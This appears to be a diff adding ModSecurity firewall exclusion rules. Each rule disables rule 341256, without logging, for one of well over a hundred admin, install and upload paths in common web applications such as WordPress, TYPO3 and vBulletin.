+SecRule REQUEST_FILENAME "/plugins/ctrt/index\.php" "phase:2,id:94106,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:94107,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install1\.php" "phase:2,id:94108,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:94109,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/" "phase:2,id:94110,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/css\.php" "phase:2,id:94111,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/upl/wc/csxml\.php" "phase:2,id:94112,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/onmouseover\.js" "phase:2,id:94113,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/vbacmps_install\.php" "phase:2,id:94114,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/bios/edit/" "phase:2,id:94115,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/index\.php" "phase:2,id:94116,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cp-admin\.cgi" "phase:2,id:94117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_admin/" "phase:2,id:94118,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/siteadmin/" "phase:2,id:94119,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cmsadmin/" "phase:2,id:94120,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forumadmin/" "phase:2,id:94121,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/management/" "phase:2,id:94122,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/" "phase:2,id:94123,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_product" "phase:2,id:94124,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/rssadmin/" "phase:2,id:94125,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/order/input\.php" "phase:2,id:94126,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ftp/index\.php" "phase:2,id:94127,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editfield\.php" "phase:2,id:94128,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin1/" "phase:2,id:94129,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit/index\.php" "phase:2,id:94130,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ticketreply\.php" "phase:2,id:94131,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiny_mce/plugins/advlink/link\.htm" "phase:2,id:94132,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webadmin/" "phase:2,id:94133,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/front_content\.php" "phase:2,id:94134,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/main/" "phase:2,id:94135,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:94136,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/formmail\.conf" "phase:2,id:94137,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard/pages" "phase:2,id:94138,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/email\.php" "phase:2,id:94139,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dict\.php" "phase:2,id:94140,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webadmin\.php" "phase:2,id:94141,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ntunnel_mysql\.ph" "phase:2,id:94142,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/planner\.php" "phase:2,id:94143,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/facebook/" "phase:2,id:94144,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install2\.php" "phase:2,id:94145,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:94146,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/stream/index\.php" "phase:2,id:94147,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/secure\.php" "phase:2,id:94148,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/uplay/" "phase:2,id:94149,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mapas_admin_edit\.php" "phase:2,id:94150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/projectpier/" "phase:2,id:94151,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/supportkb\.php" "phase:2,id:94152,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/systemadmin/supportkb\.php" "phase:2,id:94153,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage\.php" "phase:2,id:94154,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_panel/" "phase:2,id:94155,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/inc/php/img\.php" "phase:2,id:94156,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/media/" "phase:2,id:94157,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard_forms\.php" "phase:2,id:94158,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/content/types/import" "phase:2,id:94159,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:94160,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/" "phase:2,id:94161,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tstemplate/ts/index\.php" "phase:2,id:94162,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/alta\.php" "phase:2,id:94163,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:94164,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:94165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings\.php" "phase:2,id:94166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/projects/csb/ticket/" "phase:2,id:94167,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:94168,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/orderform/processor\.php" "phase:2,id:94169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/soupermail\.pl" "phase:2,id:94170,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/read_dump\.php" "phase:2,id:94171,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_center/" "phase:2,id:94172,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincenter/" "phase:2,id:94173,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homedeveloper\.php" "phase:2,id:94174,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bevestiging\.php" "phase:2,id:94175,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:94176,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/export\.php" "phase:2,id:94177,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/privado/" "phase:2,id:94178,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webform/configure" "phase:2,id:94179,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portalcp/vbpoptions\.php" "phase:2,id:94180,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thubservice\.php" "phase:2,id:94181,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/user\.php" "phase:2,id:94182,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/survey/index\.php" "phase:2,id:94183,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forum/post\.php" "phase:2,id:94184,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/crop_auto\.php" "phase:2,id:94185,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/main\.php" "phase:2,id:94186,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thumb\.php" "phase:2,id:94187,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/com_virtuemart/fetchscript\.php" "phase:2,id:94188,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/uploader\.php" "phase:2,id:94189,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/survey/preview\.php" "phase:2,id:94190,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/linkmachine\.php" "phase:2,id:94191,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/productadd\.php" "phase:2,id:94192,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admint/" "phase:2,id:94193,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setupctcform\.php" "phase:2,id:94194,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/db\.php" "phase:2,id:94195,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-translate/" "phase:2,id:94196,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailtemplate_outpay1_result\.php" "phase:2,id:94197,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/" "phase:2,id:94198,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:94199,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/socialware/popups/add_friend\.php" "phase:2,id:94200,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/open\.php" "phase:2,id:94201,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/order/totals\.php" "phase:2,id:94202,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/write\.php" "phase:2,id:94203,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addvideo\.php" "phase:2,id:94204,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/installation/install3\.php" "phase:2,id:94205,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/installation/install\.php" "phase:2,id:94206,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:94207,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/categorie\.php" "phase:2,id:94208,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:94209,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quick_reply\.php" "phase:2,id:94210,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:94211,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:94212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/glossary\.pl" "phase:2,id:94213,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-create-edit-page\.php" "phase:2,id:94214,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/question/question\.php" "phase:2,id:94215,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/" "phase:2,id:94216,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/" "phase:2,id:94217,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm/" "phase:2,id:94218,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/" "phase:2,id:94219,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/ajax\.php" "phase:2,id:94220,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:94221,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portal/index\.php" "phase:2,id:94222,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/components/com_zoom/etc/" "phase:2,id:94223,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_orders\.php" "phase:2,id:94224,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup\.jspa" "phase:2,id:94225,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages\.php" "phase:2,id:94226,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql\.php3" "phase:2,id:94227,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql\.php" "phase:2,id:94228,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ipn_main_handler\.php" "phase:2,id:94229,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/xcloner\.php" "phase:2,id:94230,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/content\.php" "phase:2,id:94231,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailordermanager5\.mvc" "phase:2,id:94232,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content_pop\.php" "phase:2,id:94233,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/backend/noticias_abm\.php" "phase:2,id:94234,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pncrtl/options\.php" "phase:2,id:94235,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin\.cgi" "phase:2,id:94236,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fim_thumb\.php" "phase:2,id:94237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/intaketemp\.php" "phase:2,id:94238,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sqltoexcel/sql2excel\.php" "phase:2,id:94239,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/moodle/mod/glossary/edit\.php" "phase:2,id:94240,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/miespacio/adpaepdc\.php" "phase:2,id:94241,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "ext/ics_awstats/mod1/index\.php" "phase:2,id:94242,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard/edit/modules/eshop/product/insert" "phase:2,id:94243,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:94244,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/response_3d\.php" "phase:2,id:94245,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/getclientpolicies\.aspx" "phase:2,id:94246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add_product\.php" "phase:2,id:94247,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/page\.php" "phase:2,id:94248,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/affiliate/scripts/server\.ph" "phase:2,id:94249,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/resize\.php$" "phase:2,id:94250,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/nota_abm\.php$" "phase:2,id:94251,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/service/producttocategory\.php" "phase:2,id:94252,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:94253,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_file_upload\.php" "phase:2,id:94254,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_create_folder\.php" "phase:2,id:94255,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/test_templates\.php" "phase:2,id:94256,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:94257,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webacula/restorejob/" "phase:2,id:94258,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/calendar/functions/popup\.php" "phase:2,id:94259,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/" "phase:2,id:94260,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_export\.php" "phase:2,id:94261,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:94262,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/civicrm/admin/" "phase:2,id:94263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/civicrm/report/contact/summary" "phase:2,id:94264,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/instellingen\.php" "phase:2,id:94265,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/listing_editresult\.php" "phase:2,id:94266,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/items_price_result\.php" "phase:2,id:94267,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/configure_homepage\.php" "phase:2,id:94268,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/newreply\.php" "phase:2,id:94269,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editpost\.php" "phase:2,id:94270,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/file_manager\.php" "phase:2,id:94271,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/conteudosactions\.php" "phase:2,id:94272,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webim/button\.php" "phase:2,id:94273,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/multimediaactions\.php" "phase:2,id:94274,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/lojaactions\.php" "phase:2,id:94275,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/config/index\.php" "phase:2,id:94276,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modedit\.php" "phase:2,id:94277,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/categories\.php" "phase:2,id:94278,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addclass\.php" "phase:2,id:94279,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/medialibrary\.php" "phase:2,id:94280,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/meta_admin\.php" "phase:2,id:94281,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/question_edit\.php" "phase:2,id:94282,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/processors/directory_addedit\.php" "phase:2,id:94283,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/widgets\.php" "phase:2,id:94284,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/aprod\.php" "phase:2,id:94285,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/ritem\.php" "phase:2,id:94286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/affiliate/scripts/server\.php" "phase:2,id:94287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
